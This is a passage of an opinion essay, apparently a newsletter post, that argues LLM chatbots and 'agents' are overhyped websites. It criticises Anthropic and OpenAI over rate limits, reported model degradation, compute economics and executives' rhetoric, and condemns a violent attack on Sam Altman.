Posts in Python (20 found)

I Will Never Respect A Website

If you like this piece and want to support my independent reporting and analysis, why not subscribe to my premium newsletter? It’s $70 a year, or $7 a month, and in return you get a weekly newsletter that’s usually anywhere from 5,000 to 18,000 words, including vast, detailed analyses of NVIDIA , Anthropic and OpenAI’s finances , and the AI bubble writ large . I recently put out the timely and important Hater’s Guide To The SaaSpocalypse , another on How AI Isn't Too Big To Fail , and a deep (17,500 word) Hater’s Guide To OpenAI .  Subscribing to premium is both great value and makes it possible to write these large, deeply-researched free pieces every week.  Soundtrack: Muse — Stockholm Syndrome I think the most enlightening thing about AI is that it shows you how even the most mediocre text inspires some sort of emotion. Soulless LinkedIn slop makes you feel frustration with a person for their lack of authenticity, but you can still imagine how they forced it out of their heads. You still connect with them, even if it’s in a bad way.  AI copy is dead. It is inert. The reason you can spot it is that it sounds hollow. I don’t care if a website says stuff on it because I typed in, just like I don’t care if it responds in a way that sounds human, because it all feels like nothing to me. I am not here to give a website respect, I will not be impressed by a website, nor will I grant a website any extra credit if it can’t do the right thing every time. The computer is meant to work for me. If the computer doesn’t do what I want, I change the kind of computer I use. LLMs will always hallucinate, their outputs are not trustworthy as a result, they cannot be deterministic, and any chance of any mistakes of any kind are unforgivable. I don’t care how the website made you feel: it’s a machine that doesn’t always work, and that’s not a very good machine.  I feel nothing when I see an LLM’s output. Tell me thank you or whatever, I don’t care. You’re a website. Oh you can spit out code? Amazing. Still a website.  Perhaps you’ve found value in LLMs. Congratulations! You should feel no compulsion to have to convince me, nor should you feel any pride in using a particular website. And if you feel you’re being judged for using AI, perhaps you should ask why you feel so vilified? Did the industry do something to somehow warrant judgment? Is there something weird or embarrassing about the product, such as it famously having a propensity to get things wrong? Perhaps it loses billions of dollars? Oh, it’s damaging to the environment too? And people are telling outright lies about it and constantly saying it’ll replace people’s jobs? And the CEOs are all greedy oafish sociopaths?  Did you try being cloying, judgmental, condescending, and aggressive to those who don’t like AI? Oh, that didn’t work? I can’t imagine why.  Sounds embarrassing! You must really like that website.  ChatGPT is a website. Claude is a website. While I guess Claude Code runs in a terminal window, that just means it’s an app, which I put in exactly the same mental box as I do a website.  Yet everything you read or hear or see about AI does everything it can to make you think that AI is something other than a website or an app. People that “discover the power of AI” immediately stop discussing it in the same terms as Microsoft Word, Google, or any other app or website. It’s never just about what AI can do today, but always about some theoretical “AGI” or vague shit about “AI agents” that are some sort of indeterminate level of “valuable” without anyone being able to describe why. Truly useful technology isn’t described in oblique or hyperbolic terms. For example, last week, IBM’s Dave McCann described using a series of “AI agents” to Business Insider Sounds like a website to me.  Sounds like a website using an LLM to summarize stuff to me. Why are we making all this effort to talk about what a website does?  My friend, this isn’t a “series of agents.” It’s an LLM that looks at stuff and spits out an answer. Chatbots have done this kind of thing forever. These aren’t “agents.” “Agents” makes it sound like there’s some sort of futuristic autonomous presence rather than a chatbot that’s looking at documents using technology that’s guaranteed to hallucinate incorrect information . Here’s a fun exercise: replace the word “agent” with “app,” and replace “AI” with “application.” In fact, let’s try that with the next quote: A variety of functions including searching for stuff, looking at stuff, generating stuff, transcribing a meeting, and searching for stuff. Wow! Who gives a fuck. Every “AI agent” story is either about code generation, summarizing some sort of information source, or generating something based on an information source that you may or may not be able to trust.  “Agent” is an intentional act of deception, and even “modern” agents like OpenClaw and its respective ripoffs ultimately boil down to “I can send you a reminder” or “I can transcribe a text you send me.” Yet everybody seems to want to believe these things are “valuable” or “useful” without ever explaining why. A page of OpenClaw integrations claiming to share “real projects, real automations [and] real magic” includes such incredible, magical use cases as “reads my X bookmarks and discusses them with me,” “check incoming mail and remove spam,” “researches people before meetings and creates briefing docs,” “schedule reminders,” “tracking who visits a website” (summarizing information), and “using voice notes to tell OpenClaw what to do,” which includes “distilling market research” (searching for stuff) and “tightening a proposal” (generating stuff after looking at it). I’d have no quarrel with any of this if it wasn’t literally described as magical and innovative. This is exactly the shit that software has always done — automations, shortcuts, reminders, and document work. Boring, potentially useful stuff done in an inefficient way requiring a Mac Mini and hundreds of dollars a day of API calls.  Even Stephen Fry’s effusive review of the iPad from 2010 , in referring to it as a “magical object,” still referred to it as “class,” “a different order of experience,” remarking on its speed, responsiveness, its “smooth glide,” and remarking that it’s so simple . Even Fry, a writer beloved for his effervescence and sophisticated lexicon, was still able to point at the things he liked (such as the design and simplicity) in clear terms. Even in couching it in terms of the future, Fry is still able to cogently explain why he’s excited about the present. Conversely, articles about Large Language Models and their associated products often describe them in one of three ways: This simply doesn’t happen outside of bubbles. The original CNET review of the iPhone — a technology I’d argue literally changed the way that human beings live their lives — still described it in terms that mirrored the reality we live in: I’d argue that technologies like cloud storage, contactless payments, streaming music, and video and digital photography have transformed our societies in ways that were obvious from the very beginning. Nobody sat around cajoling us to accept that we’d need to sunset our Nokia 3210s and get used to touchscreens because it was blatantly obvious that it was better on using the first iPhone.  Nobody ostracized you for not being sufficiently excited about iPhone apps. Git, launched in 2005, is arguably one of the single-most transformational technologies in tech history, changing how software engineers built all kinds of software . And I’d argue that Github, which came a few years later, was equally transformational.  I can’t find a single example of somebody being shamed for not being sufficiently excited, other than people arguing over whether Git was the superior version control software , or saying that  Github, a cloud-based repository for code and collaboration, was obvious in its utility. Those that liked it didn’t feel particularly defensive. Even articles about GitHub’s growth spoke entirely in terms rooted in the present. I realize this was before the hyper-polarized world of post-Musk Twitter, one where venture capital and the tech industry in general was a fraction of the size, but it’s really weird how different it feels when you read about how the stuff that actually mattered was covered. I must repeat that this was a very different world with very different incentives. Today’s tech industry is a series of giant group chats across various social networks and physical locations, with a much-larger startup community (yCombinator’s last batch had 199 people — the first had 8) influenced heavily by the whims of investors and the various cults of personality in the valley. While social pressure absolutely existed, the speed at which it could manifest and mutate was minute in comparison to the rabid dogs of Twitter or the current state of Hackernews. There were fewer VCs, too. In any case, no previous real or imagined tech revolution has ever inspired such eager defensiveness, tribalism or outright aggression toward dissenters, nor such ridiculous attempts to obfuscate the truth about a product outside of cryptocurrency, an industry with obvious corruption and financial incentives.  We’ve never had a cult of personality around a specific technology at this scale. There is something that AI does to people — in the way it both functions and the way that people react to it —  that inspires them to act, defensively, weirdly, tribally. I think it starts with LLMs themselves, and the feeling they create within a user. We all love prompts. We love to be asked questions about ourselves. We feel important when somebody takes interest in what we’re doing, and even more-so when they remember things about it and seem to be paying attention. LLMs are built to completely focus themselves on us and do so while affirming every single interaction.  Human beings also naturally crave order and structure, which means we’ve created frameworks in our head about what authoritative-sounding or looking information looks like, and the language that engenders trust in it. We trust Wikipedia both because it’s an incredibly well-maintained library of information riddled with citations and because it tonally and structurally resembles an authoritative source. Large Language Models have been explicitly trained to deliver information (through training on much of the internet including Wikipedia) in a structured manner that makes us trust it like we would another source massaged with language we’d expect from a trusted friend or endlessly-patient teacher. All of this is done with the intention of making you forget that you’re using a website. And that deception is what starts to make people act strangely. The fact that an LLM can maybe do something is enough to make people try it, along with the constant pressure from social media, peers and the mainstream media.  Some people — such as myself — have used LLMs to do things, seen that making them do said things isn’t going to happen very easily, and walked away because I am not going to use a website that doesn’t do what it says.  As I’ve previously said, technology is a tool to do stuff. Some technology requires you to “get used to it” — iPhones and iPads were both novel (and weird) in their time, as was learning to use the Moonlander ZSK — but in basically every example doesn’t involve you tolerating the inherent failings of the underlying product under the auspices of it “one day being better.” Nowhere else in the world of technology does someone gaslight you into believing that the problems don’t exist or will magically disappear. It’s not like the iPhone only occasionally allowed you to successfully take a photo, and reliable photography was something that you’d have to wait until the iPhone 3GS to enjoy. While the picture quality improved over time, every generation of iPhone all did the same basic thing successfully, reliably, and consistently.  I also think that the challenge of making an LLM do something useful is addictive and transformative. When people say they’ve “learned to use AI,” often they mean that they’ve worked out ways to fudge their prompts, navigate its failures, mitigate its hallucinations, and connect it to various different APIs and systems of record in such a way that it now, on a prompt, does something , and because they’re the ones that built this messy little process, they feel superior — because the model has repeatedly told them that they were smart for doing it and celebrated with them when they “succeeded.”  The term “AI agent” exists as both a marketing term and a way to ingratiate the user. Saying “yeah I used a chatbot to do some stuff” sounds boring, like you’re talking to an app or a website, but “using an AI agent” makes you sound like a futuristic cyber-warrior , even though you’re doing exactly the same thing. LLMs are excellent digital busyboxes for those who want to come up with a way to work differently rather than actually doing work. In WIRED’s article about journalists using AI , Alex Heath boasts that he “feels like he’s cheating in a way that feels amazing”: The linguistics of “transmitting an idea to an AI agent” misrepresent what is a deeply boring and soulless experience. Alex speaks into a microphone, his words are transcribed, then an LLM burps out a draft. A bunch of different services connect to Claude Cowork and a text document (that’s what the “custom set of instructions” is) that says how to write like him, and then it writes like him, and then he talks to it and then sometimes writes bits of the story himself. This is also most decidedly not automation. Heath still must sit and prompt a model again and again. He must still maintain connections to various services and make sure the associated documents in Notion are correct. He must make sure that Granola actually gets the transcriptions from his interview. He must (I would hope) still check both the AI transcription and the output from the model to make sure quotes are accurate. He must make sure his calendar reflects accurate information. He must make sure that Claude still follows his “voice and writing style” — if you can call it that given the amount of distance between him and the product. Well, Alex, you’re not telling anybody anything, your ideas and words come out of a Large Language Model that has convinced you that you’re writing them.  In any case, Heath’s process is a great example of what makes people think they’re “using powerful AI.” Large Language Models are extremely adept at convincing human beings to do most of the work and then credit “AI” with the outcomes. Alex’s process sounds convoluted and, if I’m honest, a lot more work than the old way of doing things. It’s like writing a blog using a machine from Pee-wee’s Playhouse.  I couldn’t eat breakfast that way every morning. I bet it would get old pretty quick. This is the reality of the Large Language Model era. LLMs are not “artificial intelligence” at all. They do not think, they do not have knowledge, they are conjuring up their own training data (or reflecting post-training instructions from those developing them or documents instructing them to act a certain way), and any time you try and make them do something more-complicated, they begin to fall apart, and/or become exponentially more-expensive. You’ll notice that most AI boosters have some sort of bizarre, overly-complicated way of explaining how they use AI. They spin up “multiple agents” (chatbots) that each have their own “skills document” (a text document) and connect “harnesses” (python scripts, text files that tell it what to do, a search engine, an API) that “let it run agentic workflows” (query various tools to get an outcome.”  The so-called “agentic AI” that is supposedly powerful and autonomous is actually incredibly demanding of its human users — you must set it up in so many different ways and connect it to so many different services and check that every “agent” (different chatbot) is instructed in exactly the right way, and that none of these agents cause any problems (they will) with each other. Oh, don’t forget to set certain ones to “high-thinking” for certain tasks and make sure that other tasks that are “easier” are given to cheaper models, and make sure that those models are prompted as necessary so they don’t burn tokens. But the process of setting up all those agents is so satisfying, and when they actually succeed in doing something — even if it took fucking forever and costs a bunch and is incredibly inefficient — you feel like a god! And because you can “spin up multiple agents,” each one ready and waiting for you to give them commands (and ready to affirm each and every one of them), you feel powerful, like you’re commanding an army that also requires you to monitor whatever it does. The reason that LLMs have become so interesting for software engineers is that this is already how they lived. Writing software is often a case of taping together different systems and creating little scripts and automations that make them all work, and the satisfaction of building functional software is incredible, even at the early stages.  Large Language Models perform an impression of automating that process, but for the most part force you, the user, to do the shit that matters, even if that means “be responsible for the code that it puts out.” Heath’s process does not appear to take less time than his previous one — he’s just moved stuff around a bit and found a website to tell him he’s smart for doing so.  They are Language Models interpreting language without any knowledge or thoughts or feelings or ability to learn, and each time they read something they interpret meaning based on their training data, which means they can (and will!) make mistakes, and when they’re, say, talking to another chatbot to tell it what to do next, that little mistake might build a fundamental flaw in the software, or just break the process entirely.  And Large Language Models — using the media — exist to try and convince you that these mistakes are acceptable. When Anthropic launched its Claude For Finance tool , which claims to “automate financial modeling” with “pre-built agents” (chatbots) but really appears to just be able to create questionably-useful models via Excel spreadsheets and “financial research” based on connecting to documents in your various systems, I imagine with a specific system prompt. Anthropic also proudly announced that it had scored a 55.3% on the Finance Agent Test .  I hate to repeat myself, but I will not respect a website, and I will not tolerate something being “55% good” at something if its alleged use case is that it’s an artificial intelligence.  Yet that’s the other remarkable thing about the LLM era — that there are people who are extremely tolerant of potential failures because they believe they’re either A) smart enough to catch them or B) smart enough to build systems that do so for them, with a little sprinkle of “humans make mistakes too,” conflating “an LLM that doesn’t know anything fucking up by definition” with “a human being with experiences and the capacity for adaptation making a mistake.”  I truly have no beef with people using LLMs to speed up Python scripts to do fun little automations or to dig through big datasets, but please don’t try and convince me they’re being futuristic by doing so. If you want to learn Python, I recommend reading Al Sweigart’s Automate The Boring Stuff . Anytime somebody sneers at you and says you are being “left behind” because you’re not using AI should be forced to show you what it is they’ve created or done, and the specific system they used to do so. They should have to show you how much work it took to prepare the system, and why it’s superior to just doing it themselves.  Karpathy also had a recent (and very long) tweet about “ the growing gap in understanding of AI capability ,” involving more word salad than a fucking SweetGreen: Wondering what those “staggering improvements” are?  The one tangible (and theoretical!) example Karpathy gives is an example of how hard people work to overstate the capabilities of LLMs. “Coherently restructuring” a codebase might happen when you feed it to an LLM (while also costing a shit-ton of tokens, but putting that aside), or it might not understand at all because Claude Opus is acting funny that day , or it might sort-of fix it but mess something subtle up that breaks things in the future. This is an LLM doing exactly what an LLM does — it looks at a block of text, sees whether it matches up with what a user said, sees how that matches with its training data, and then either tells you things to do or generates new code, much like it would do if you had a paragraph of text you needed to fact-check. Perhaps it would get some of the facts right if connected to the right system. Perhaps it might make a subtle error. Perhaps it might get everything wrong. This is the core problem with the “checkmate, boosters — AI can write code!” problem. AI can write code. We knew that already. It gets “better” as measured by benchmarks that don’t really compare to real world success , and even with the supposedly meteoric improvements over the last few months, nobody can actually explain what the result of it being better is, nor does it appear to extend to any domain outside of coding. You’ll also notice that Karpathy’s language is as ingratiating to true believers as it is vague. Other domains are left unexplained other than references to “research” and “math.” I’m in a research-heavy business, and I have tried the most-powerful LLMs and highest-priced RAG/post-RAG research tools, and every time find them bereft of any unique analysis or suggestions.  I don’t dispute that LLMs are useful for generating code, nor do I question whether or not they’re being used by software developers at scale. I just think that they would be used dramatically less if there weren’t an industrial-scale publicity campaign run through the media and the majority of corporate America both incentivizing and forcing them to do so.  Similarly, I’m not sure anybody would’ve been anywhere near as excited if OpenAI and Anthropic hadn’t intentionally sold them a product that was impossible to support long-term.  This entire industry has been sold on a lie, and as capacity becomes an issue, even true believers are turning on the AI labs. About a year ago, I warned you that Anthropic and OpenAI had begun the Subprime AI Crisis , where both companies created “priority processing tiers” for enterprise customers (read: AI startups like Replit and Cursor), dramatically increasing the cost of running their services to the point that both had to dramatically change their features as a result. A few weeks later, I wrote another piece about how Anthropic was allowing its subscribers to burn thousands of dollars’ worth of tokens on its $100 and $200-a-month subscriptions, and asked the following question at the end: I was right to ask, as a few weeks ago ( as I wrote in the Subprime AI Crisis Is Here ) that Anthropic had added “peak hours” to its rate limits, and users found across the board that they were burning through their limits in some cases in only a few prompts . Anthropic’s response was, after saying it was looking into why rate limits were being hit so fast , to say that users were ineffectively utilizing the 1-million-token context window and failing to adjust Claude’s “thinking effort level” based on whatever task it is they were doing. Anthropic’s customers were (and remain) furious , as you can see in the replies of its thread on the r/Anthropic Subreddit . To make matters worse, it appears that — deliberately or otherwise — Anthropic has been degrading the performance of both Claude Opus 4.6 and Claude Code itself , with developers, including AMD Senior AI Director Stella Laurenzo, documenting the problem at length (per VentureBeat): Think that Anthropic cares? Think again:  Another developer found that Claude Opus 4.6 was “thinking 67% less than it used to,” though Anthropic didn’t even bother to respond. In fact, Anthropic has done very little to explain what’s actually happening, other than to say that it doesn’t degrade its models to better serve demand . To be clear, this is far from the only time that I’ve seen people complain about these models “getting dumber” — users on basically every AI Subreddit will say, at some point, that models randomly can’t do things they used to be able to, with nobody really having an answer other than “yeah dude, same.”  Back in September 2025, developer Theo Browne complained that Claude had got dumber , but Anthropic near-immediately responded to say that the degraded responses were a result of bugs that “intermittently degraded responses from Claude,” adding the following:  Which begs the question: is Anthropic accidentally making its models worse? Because it’s obvious it’s happening, it’s obvious they know something is happening, and its response, at least so far, has been to say that either users need to tweak their settings or nothing is wrong at all. Yet these complaints have happened for years, and have reached a crescendo with the latest ones that involve, in some cases, Claude Code burning way more tokens for absolutely no reason , hitting rate limits earlier than expected or wasting actual dollars spent on API calls. Some suggest that the problems are a result of capacity issues over at Anthropic, which have led to a stunning (at least for software used by millions of people) amounts of downtime, per the Wall Street Journal : This naturally led to boosters (and, for that matter, the Wall Street Journal) immediately saying that this was a sign of the “insatiable demand for AI compute”: Before I go any further: if anyone has been taking $2.75-per-hour-per-GPU for any kind of Blackwell GPU, they are losing money. Shit, I think they are at $4.08. While these are examples from on-demand pricing (versus paid-up years-long contracts like Anthropic buys), if they’re indicative of wider pricing on Blackwell, this is an economic catastrophe. In any case, Anthropic’s compute constraints are a convenient excuse to start fucking over its customers at scale. Rate limits that were initially believed to be a “ bug ” are now the standard operating limits of using Anthropic’s services, and its models are absolutely, fundamentally worse than they were even a month ago. It’s January 14 2026, and you just read The Atlantic’s breathless hype-slop about Claude Code , believing that it was “bigger than the ChatGPT moment,” that it was an “inflection point for AI progress,” and that it could build whatever software you imagined. While you’re not exactly sure what it is you’re meant to be excited about, your boss has been going on and on about how “those who don’t use AI will be left behind,” and your boss allows you to pay $200 for a year’s access to Claude Pro. You, as a customer, no longer have access to the product you purchased. Your rate limits are entirely different, service uptime is measurably worse, and model performance has, for some reason, taken a massive dip. You hit your rate limits in minutes rather than hours. Prompts that previously allowed you a healthy back-and-forth over a project are now either impractical or impossible.  Your boss now has you vibe-coding barely-functional apps as a means of “integrating you with the development stack,” but every time you feed it a screenshot of what’s going wrong with the app you seem to hit your rate limits again. You ask your boss if he’ll upgrade you to the $100-a-month subscription, and he says that “you’ve got to make do, times are tough.” You sit at your desk trying to work out what the fuck to do for the next four hours, as you do not know how to code and what little you’ve been able to do is now impossible. This is the reality for a lot of AI subscribers, though in many cases they’ll simply subscribe to OpenAI Codex or another service that hasn’t brought the hammer down on their rate limits. …for now, at least. The con of the Large Language Model era is that any subscription you pay for is massively subsidized, and that any product you use can and will see its service degraded as these companies desperately try to either ease their capacity issues or lower their burn rate. Yet it’s unclear whether “more capacity” means that things will be cheaper, or better, or just a way of Anthropic scaling an increasingly-shittier experience.  To explain, when an AI lab like Anthropic or OpenAI “hits capacity limits,” it doesn’t mean that they start turning away business or stop accepting subscribers, but that current (and new) subscribers will face randomized downtime and model issues, along with increasingly-punishing rate limits.  Neither company is facing a financial shortfall as a result of being unable to provide their services (rather, they’re facing financial shortfalls because they’re providing their services to customers. And yet, the only people that are the only people paying that price because of these “capacity limits” are the customers. This is because AI labs must, when planning capacity, make arbitrary guesses about how large the company will get, and in the event that they acquire too much capacity, they’ll find themselves in financial dire straits, as Anthropic CEO Dario Amodei told Dwarkesh Patel back in February :  What happens if you don’t buy enough compute? Well, you find yourself having to buy it last-minute, which costs more money, which further erodes your margins, per The Information : In other words, compute capacity is a knife-catching game. Ordering compute in advance lets you lock in a better rate, but having to buy compute at the last-minute spikes those prices, eating any potential margin that might have been saved as a result of serving that extra demand.  Order too little compute and you’ll find yourself unable to run stable and reliable services, spiking your costs as you rush to find more capacity. Order too much capacity and you’ll have too little revenue to pay for it. It’s important to note that the “demand” in question here isn’t revenue waiting in the wings, but customers that are already paying you that want to do more with the product they paid for. More capacity allows you to potentially onboard new customers, but they too face the same problems as your capacity fills.  This also begs the question: how much capacity is “enough”? It’s clear that current capacity issues are a result of the inference (the creation of outputs) demands of Anthropic’s users. What does adding more capacity do, other than potentially bringing that under control?  This also suggests that Anthropic’s (and OpenAI’s by extension) business model is fundamentally flawed. At its current infrastructure scale, Anthropic cannot satisfactorily serve its current paying customer base , and even with this questionably-stable farce of a product, Anthropic still expects to burn $14 billion . While adding more capacity might potentially allow new customers to subscribe, said new customers would also add more strain on capacity, which would likely mean that nobody’s service improves but Anthropic still makes money. It ultimately comes down to the definition of the word “demand.” Let me explain. Data center development is very slow. Only 5GW of capacity is under construction worldwide (and “construction” can mean anything from a single steel beam to a near-complete building). As a result, both Anthropic and OpenAI are planning and paying for capacity years in advance based on “demand.” “Demand” in this case doesn’t just mean “people who want to pay for services,” but “the amount of compute that the people who pay us now and may pay us in the future will need for whatever it is they do.”  The amount of compute that a user may use varies wildly based on the model they choose and the task in question — a source at Microsoft once told me in the middle of last year that a single user could take up as many as 12 GPUs with a coding task using OpenAI’s o4-mini — which means that in a very real sense these guys are guessing and hoping for the best. It also means that their natural choice will be to fuck over their current users to ease their capacity issues, especially when those users are paying on a monthly or — ideally — annual basis. OpenAI and Anthropic need to show continued revenue growth, which means that they must have capacity available for new customers, which means that old customers will always be the first to be punished. We’re already seeing this with OpenAI’s new $100-a-month subscription, a kind of middle ground between its $20 and $200-a-month ChatGPT subscriptions that appears to have immediately reduced rate limits for $20-a-month subscribers.  To obfuscate the changes further, OpenAI also launched a bonus rate limit period through May 31 2026 , telling users that they will have “10x or 20x higher rate limits than plus” on its pricing page while also featuring a tiny little note that’s very easy for somebody to miss: This is a fundamentally insane and deceptive way to run a business, and I believe things will only get worse as capacity issues continue. Not only must Anthropic and OpenAI find a way to make their unsustainable and unprofitable services burn less money, but they must also constantly dance with metering out whatever capacity they have to their customers, because the more extra capacity they buy, the more money they lose.   However you feel about what LLMs can do, it’s impossible to ignore the incredible abuse and deception happening to just about every customer of an AI service. As I’ve said for years, AI companies are inherently unsustainable due to the unreliable and inconsistent outputs of Large Language Models and the incredible costs of providing the services. It’s also clear, at this point, that Anthropic and OpenAI have both offered subscriptions that were impossible to provide at scale at the price and availability that they were leading up to 2026, and that they did so with the intention of growing their revenue to acquire more customers, equity investment and attention.  As a result, customers of AI services have built workflows and habits based on an act of deceit. While some will say “this is just what tech companies do, they get you in when it’s cheap then jack up the price,” doing so is an act of cowardice and allegiance with the rich and powerful.  To be clear, Anthropic and OpenAI need to do this. They’ve always needed to do this. In fact, the ethical thing to do would’ve been to charge for and restrict the services in line with their actual costs so that users could have reliable and consistent access to the services in question. As of now, anyone that purchases any kind of AI subscription is subject to the whims of both the AI labs and their ability to successfully manage their capacity, which may or may not involve making the product that a user pays for worse. The “demand” for AI as it stands is an act of fiction, as much of that demand was conjured up using products that were either cheaper or more-available. Every one of those effusive, breathless hype-screeds about Claude Code from January or February 2026 are discussing a product that no longer exists. On June 1 2026, any article or post about Codex’s efficacy must be rewritten, as rate limits will be halved .  While for legal reasons I’ll stop short of the most obvious word, Anthropic and OpenAI are running — intentionally or otherwise — deeply deceitful businesses where their customers cannot realistically judge the quality or availability of the service long-term. These companies also are clearly aware that their services are deeply unpopular and capacity-constrained, yet aggressively court and market toward new customers, guaranteeing further service degradations and potential issues with models. This applies even to API customers, who face exactly the same downtime and model quality issues, all with the indignity of paying on a per-million token basis, even when Claude Opus 4.6 decides to crap itself while refactoring something, running token-intensive “agents” to fix simple bugs or fails to abide by a user’s guidelines .  This is not a dignified way to use software, nor is it an ethical way to sell it.  How can you plan around this technology? Every month some new bullshit pops up. While incremental model gains may seem like a boon, how do you actually say “ok, let’s plan ahead” for a technology that CHANGES, for better or for worse, at random intervals? You’re constantly reevaluating model choices and harnesses and prompts and all kinds of other bullshit that also breaks in random ways because “that’s how large language models work.” Is that fun? Is that exciting? Do you like this? It seems exhausting to me, and nobody seems to be able to explain what’s good about it. How, exactly, does this change?  Right now, I’d guess that OpenAI has access to around 2GW of capacity ( as of the end of 2025 ), and Anthropic around 1GW based on discussions with sources. OpenAI is already building out around 10GW of capacity with Oracle, as well as locking in deals with CoreWeave ( $22.4 billion ), Amazon Web Services ( $138 billion ), Microsoft Azure ( $250 billion ), and Cerebras (“ 750MW ”). Meanwhile, Anthropic is now bringing on “multiple gigawatts of Google’s next-generation TPU capacity ” on top of deals with Microsoft , Hut8 , CoreWeave and Amazon Web Services. Both of these companies are making extremely large bets that their growth will continue at an astonishing, near-impossible rate. If OpenAI has reached “ $2 billion a month ” (which I doubt it can pay for) with around 2GW of capacity, this means that it has pre-ordered compute assuming it will make $10 billion or $20 billion a month in a few short years, which fits with The Information’s reporting that OpenAI projects it will make $113 billion in revenue in 2028. And if it doesn’t make that much revenue — and also doesn’t get funding or debt to support it — OpenAI will run out of money, much as Anthropic will if that capacity gets built and it doesn’t make tens of billions of dollars a month to pay for it. I see no scenario where costs come down, or where rate limits are eased. In fact, I think that as capacity limits get hit, both Anthropic and OpenAI will degrade the experience for the user (either through model degradation or rate limit decay) as much as they can.  I imagine that at some point enterprise customers will be able to pay for an even higher priority tier, and that Anthropic’s “Teams” subscription (which allows you to use the same subsidized subscriptions as everyone else) will be killed off, forcing anyone in an organization paying for Claude Code (and eventually Codex) via the API, as has already happened for Anthropic’s enterprise users. Anyone integrating generative AI is part of a very large and randomized beta test. The product you pay for today will be materially different in its quality and availability in mere months. I told you this would happen in September 2024 . I have been trying to warn you this would happen, and I will repeat myself: these companies are losing so much more money than you can think of, and they are going to twist the knife in and take as many liberties with their users and the media as they can on the way down.  It is fundamentally insane that we are treating these companies as real businesses, either in their economics or in the consistency of the product they offer.  These are unethical products sold in deceptive ways, both in their functionality and availability, and to defend them is to help assist in a society-wide con with very few winners. And even if you like this, mark my words — your current way of life is unsustainable, and these companies have already made it clear they will make the service worse, without warning, if they even acknowledge that they’ve done so directly. The thing you pay for is not sustainable at its current price and they have no way to fix that problem.  Do you not see you are being had? Do you not see that you are being used?  Do any of you think this is good? Does any of this actually feel like progress?  I think it’s miserable, joyless and corrosive to the human soul, at least in the way that so many people talk about AI. It isn’t even intelligent. It’s just more software that is built to make you defend it, to support it, to do the work it can’t so you can present the work as your own but also give it all the credit.  And to be clear, these companies absolutely fucking loathe you. They’ll make your service worse at a moment’s notice and then tell you nothing is wrong.  Anyone using a subscription to OpenAI or Anthropic’s services needs to wake up and realize that their way of life is going away — that rate limits will make current workflows impossible, that prices will increase, and that the product they’re selling even today is not one that makes any economic sense. Every single LLM product is being sold under false pretenses about what’s actually sustainable and possible long term. With AI, you’re not just the product, you’re a beta tester that pays for the privilege. And you’re a mark for untrustworthy con men selling software using deceptive and dangerous rhetoric.  I will be abundantly clear for legal reasons that it is illegal to throw a Molotov cocktail at anyone, as it is morally objectionable to do so. I explicitly and fundamentally object to the recent acts of violence against Sam Altman. It is also morally repugnant for Sam Altman to somehow suggest that the careful, thoughtful, determined, and eagerly fair work of Ronan Farrow and Andrew Marantz is in any way responsible for these acts of violence. Doing so is a deliberate attempt to chill the air around criticism of AI and its associated companies. Altman has since walked back the comments , claiming he “wishes he hadn’t used” a non-specific amount of the following words: These words remain on his blog, which suggests that Altman doesn’t regret them enough to remove them. I do, however, agree with Mr. Altman that the rhetoric around AI does need to change.  Both he and Mr. Amodei need to immediately stop overstating the capabilities of Large Language Models. Mr. Altman and Mr. Amodei should not discuss being “ scared ” of their models, or being “uncomfortable” that men such as they are in control unless they wish to shut down their services, or that they “ don’t know if models are conscious .”  They should immediately stop misleading people through company documentation that models are “ blackmailing ” people or, as Anthropic did in its Mythos system card , suggest a model has “broken containment and sent a message” when it A) was instructed to do so and B) did not actually break out of any container. They must stop discussing threats to jobs without actual meaningful data that is significantly more sound than “jobs that might be affected someday but for now we’ve got a chatbot.” Mr. Amodei should immediately cease any and all discussions of AI potentially or otherwise eliminating 50% of white collar jobs , as Mr. Altman should cease predicting when Superintelligence might arrive, as Mr. Amodei should actively reject and denounce any suggestions of AI “ creating a white collar bloodbath .” Those that defend AI labs will claim that these are “difficult conversations that need to be had,” when in actuality they engage in dangerous and frightening rhetoric as a means of boosting a company’s valuation and garnering attention. If either of these men truly believed these things were true, they would do something about it other than saying “you should be scared of us and the things we’re making, and I’m the only one brave enough to say anything.”  These conversations are also nonsensical and misleading when you compare them to what Large Language Models can do, and this rhetoric is a blatant attempt to scare people into paying for software today based on what it absolutely cannot and will not do in the future . It is an attempt to obfuscate the actual efficacy of a technology as a means of deceiving investors, the media and the general public.  Both Altman and Amodei engage in the language of AI doomerism as a means of generating attention, revenue and investment capital, actively selling their software and future investment potential based on their ownership of a technology that they say (disingenuously) is potentially going to take everybody’s jobs.  Based on reports from his Instagram , the man who threw the molotov cocktail at Sam Altman’s house was at least partially inspired by If Anyone Builds It, Everyone Dies, a doomer porn fantasy written by a pair of overly-verbose dunces spreading fearful language about the power of AI, inspired by the fearmongering of Altman himself. Altman suggested in 2023 that one of the authors might deserve the Nobel Peace Prize . I only see one side engaged in dangerous rhetoric, and it’s the ones that have the most to gain from spreading it. I need to be clear that this act of violence is not something I endorse in any way. I am also glad that nobody was hurt.  I also think we need to be clear about the circumstances — and the rhetoric — that led somebody to do this, and why the AI industry needs to be well aware that the society they’re continually threatening with job loss is one full of people that are very, very close to the edge. This is not about anybody being “deserving” of anything, but a frank evaluation of cause and effect.  People feel like they’re being fucking tortured every time they load social media. Their money doesn’t go as far. Their financial situation has never been worse . Every time they read something it’s a story about ICE patrols or a near-nuclear war in Iran, or that gas is more expensive, or that there’s worrying things happening in private credit. Nobody can afford a house and layoffs are constant. One group, however, appears to exist in an alternative world where anything they want is possible. They can raise as much money as they want . They can build as big a building as they want anywhere in the world. Everything they do is taken so seriously that the government will call a meeting about it . Every single media outlet talks about everything they do. Your boss forces you to use it. Every piece of software forces you to at least acknowledge that they use it too. Everyone is talking about it with complete certainty despite it not being completely clear why. As many people writhe in continual agony and fear, AI promises — but never quite delivers — some sort of vague utopia at the highest cost known to man. And these companies are, in no uncertain terms, coming for your job.  That’s what they want to do. They all say it. They use deceptively-worded studies that talk about “AI-exposed” careers to scare and mislead people into believing LLMs are coming for their jobs, all while spreading vague proclamations about how said job loss is imminent but also always 12 months away . Altman even says that jobs that will vanish weren’t real work to begin with , much as former OpenAI CTO Mira Murati said that some creative jobs shouldn’t have existed in the first place . These people who sell a product with no benefit comparable on any level to its ruinous, trillion-dollar cost are able to get anything they want at a time when those who work hard are given a kick in the fucking teeth, sneered at for not “using AI” that doesn’t actually seem to make their lives easier, and then told that their labor doesn’t constitute “real work.” At a time when nobody living a normal life feels like they have enough, the AI industry always seems to get more. There’s not enough money for free college or housing or healthcare or daycare but there’s always more money for AI compute.  Regular people face the harshest credit market in generations but private credit and specifically data centers can always get more money and more land .  AI can never fail — it can only be failed. If it doesn’t work, you simply don’t know how to 